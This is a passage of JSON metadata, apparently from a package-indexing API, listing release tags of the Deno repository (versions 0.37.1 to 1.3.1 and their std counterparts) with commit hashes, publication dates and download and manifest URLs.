ag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/a